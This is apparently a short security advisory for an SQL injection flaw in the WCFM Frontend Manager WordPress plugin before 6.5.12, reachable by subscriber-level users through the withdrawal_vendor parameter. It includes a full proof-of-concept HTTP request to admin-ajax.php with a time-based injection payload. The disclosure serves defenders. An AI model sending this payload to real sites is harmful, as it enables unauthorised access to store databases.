WCFM - Frontend Manager for WooCommerce < 6.5.12 - Customer/Subscriber+ SQL Injection

The plugin, when used in combination with another WCFM - WooCommerce Multivendor plugin such as WCFM - WooCommerce Multivendor Marketplace, does not escape the withdrawal_vendor parameter before using it in a SQL statement, allowing low privilege users such as Subscribers to perform SQL injection attacks

PoC

With the woocommerce, wc-frontend-manager and wc-multivendor-marketplace plugins installed POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: [subscriber+] Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 115 action=wcfm_ajax_controller&controller;=wcfm-withdrawal-reverse&withdrawal;_vendor=1+union+select+1+and+sleep(10)–±